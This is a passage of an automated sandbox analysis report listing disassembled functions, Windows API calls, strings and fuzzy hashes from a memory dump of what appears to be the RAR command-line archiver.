                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LoadString$Sleepfflushswprintf
                                                                                                                                                                      • String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
                                                                                                                                                                      • API String ID: 668332963-4283793440
                                                                                                                                                                      • Opcode ID: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                      • Instruction ID: 40e81a44f2659fa0c676bc42ae6e82f6387a5fafbad0a9f25396888f8d18ded9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8ea6443075516ef75a1cc4a574829b3674ffe9441b9a75d90d101af6c7dd28b8
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F22AF23A0D6C395EB24FB68D8444FDA7A1FB85348FC44037D68D076AADE6CE646C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79DD2C0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 313fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF7D79DD4A6
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF7D79DD4B9
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF73
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF84
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7D79DEFA7
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D79DEFCA
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: GetLastError.KERNEL32 ref: 00007FF7D79DEFD4
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: CloseHandle.KERNEL32 ref: 00007FF7D79DEFE7
                                                                                                                                                                      • CreateDirectoryW.KERNEL32 ref: 00007FF7D79DD4C6
                                                                                                                                                                      • CreateFileW.KERNEL32 ref: 00007FF7D79DD64A
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF7D79DD68B
                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00007FF7D79DD69A
                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00007FF7D79DD6AD
                                                                                                                                                                      • RemoveDirectoryW.KERNEL32 ref: 00007FF7D79DD6FA
                                                                                                                                                                      • DeleteFileW.KERNEL32 ref: 00007FF7D79DD705
                                                                                                                                                                        • Part of subcall function 00007FF7D79E2310: FlushFileBuffers.KERNEL32 ref: 00007FF7D79E233E
                                                                                                                                                                        • Part of subcall function 00007FF7D79E2310: SetFileTime.KERNEL32 ref: 00007FF7D79E23DB
                                                                                                                                                                        • Part of subcall function 00007FF7D79E1930: FindCloseChangeNotification.KERNELBASE ref: 00007FF7D79E1958
                                                                                                                                                                        • Part of subcall function 00007FF7D79E39E0: SetFileAttributesW.KERNEL32(?,00007FF7D79E34EE,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E3A0F
                                                                                                                                                                        • Part of subcall function 00007FF7D79E39E0: SetFileAttributesW.KERNEL32(?,00007FF7D79E34EE,?,?,?,?,00000800,00000000,00000000,00007FF7D79F38CB,?,?,?,00007FF7D79F41EC), ref: 00007FF7D79E3A3C
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$Close$CreateHandle$AttributesDirectoryErrorLastProcessToken$AdjustBuffersChangeControlCurrentDeleteDeviceFindFlushLookupNotificationOpenPrivilegePrivilegesRemoveTimeValue
                                                                                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                      • API String ID: 2827264287-3508440684
                                                                                                                                                                      • Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                      • Instruction ID: 6d8b9387ca755b81e7cbffd46adee73bdad67f6edb2c9526fca8c993f3518cd1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
                                                                                                                                                                      • Instruction Fuzzy Hash: 47D1BE26A0868796EB24AF64D8846FDA7A0FB40798FC44133DA5D476D9DF3CD507C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B57C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54shutdownCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                      • API String ID: 3729174658-3733053543
                                                                                                                                                                      • Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                      • Instruction ID: b9deda037ff1e3cd2f5375fb65b69833183dbe07c1ecc135a15fed3c75fa70af
                                                                                                                                                                      • Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
                                                                                                                                                                      • Instruction Fuzzy Hash: EE21A131A2865282F798AB69A855B7FF261EBC5704FD05037D90E0A558CF3DD44A8720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79DE21C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 148fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE298
                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE2AB
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE2F7
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF73
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF7D79DEE47), ref: 00007FF7D79DEF84
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF7D79DEFA7
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF7D79DEFCA
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: GetLastError.KERNEL32 ref: 00007FF7D79DEFD4
                                                                                                                                                                        • Part of subcall function 00007FF7D79DEF50: CloseHandle.KERNEL32 ref: 00007FF7D79DEFE7
                                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 00007FF7D79DE357
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF7D79C2014), ref: 00007FF7D79DE362
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                      • String ID: SeBackupPrivilege
                                                                                                                                                                      • API String ID: 3094086963-2429070247
                                                                                                                                                                      • Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction ID: 20302ad22b6f0c776bdd8c04fdb52b11497d79c4f4bdbdce7ff768ef449cd45d
                                                                                                                                                                      • Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
                                                                                                                                                                      • Instruction Fuzzy Hash: 0561B432A0868286E714AF65E4886FDB361FB84798FC4423ADB6E176D4DF3CD546C720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C42E0 Relevance: 6.3, APIs: 4, Instructions: 344COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3116915952-0
                                                                                                                                                                      • Opcode ID: 41abb0b37b8000e8a53cd72c17e2ad468adb8241ec6e79e21d50c4a62cc1527e
                                                                                                                                                                      • Instruction ID: 9d404965e9fb04c2373ec5c92061df0cdcb2f3a05045630b190324bdee73fbef
                                                                                                                                                                      • Opcode Fuzzy Hash: 41abb0b37b8000e8a53cd72c17e2ad468adb8241ec6e79e21d50c4a62cc1527e
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AE13C23A08A8381EE24FF25D4555EDA7A5FB85788FD45033DE4D0B7AADE38D506CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79C8884 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: CMT
                                                                                                                                                                      • API String ID: 0-2756464174
                                                                                                                                                                      • Opcode ID: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                      • Instruction ID: 965848acc3551ee42cb23fde6f83627168540eb9a27524e56cb8a773e7d52abb
                                                                                                                                                                      • Opcode Fuzzy Hash: 692117ba37696853c3eb7719182859ca18d07d81e1248deabc0defdb2174d0ba
                                                                                                                                                                      • Instruction Fuzzy Hash: F7D1D063A186A381EE24FB25D4409BDA3A1FB85B98FC44533DA5E476D5DF3CE142CB20
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A286D4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A28704
                                                                                                                                                                        • Part of subcall function 00007FF7D7A24E3C: GetCurrentProcess.KERNEL32(00007FF7D7A29CC5), ref: 00007FF7D7A24E69
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: *?$.
                                                                                                                                                                      • API String ID: 2518042432-3972193922
                                                                                                                                                                      • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction ID: 741eebfaf59a74984aeca5d289e5a6497852147e80a1d71dce415af9d3aa2c30
                                                                                                                                                                      • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                      • Instruction Fuzzy Hash: A851F822F146A585FB18EFA998008BCA7A4FB94BD4BC45533EE0D2BB85DF3CD4428310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A0B340 Relevance: 4.5, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction ID: 29f4b0fed532cb7d7cf42f54ffe4719b3df2af957b19e182e5697518ef1f3488
                                                                                                                                                                      • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E114C72B146018AE7149FB9E4816AEB7B0FB88748F80153ADA8D97A58CF3CC145CB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D79E3144 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DiskFreeSpace
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1705453755-0
                                                                                                                                                                      • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction ID: 5b20083896838a9679c611f244a178724ccf326c39230e27011d6b69cb5d2a03
                                                                                                                                                                      • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                      • Instruction Fuzzy Hash: 27012D2262C68187EB74EB25E4517AEB3A1FB84748FC00136E68C82548DE6CD606CF60
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF7D7A26130 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmpDownload File
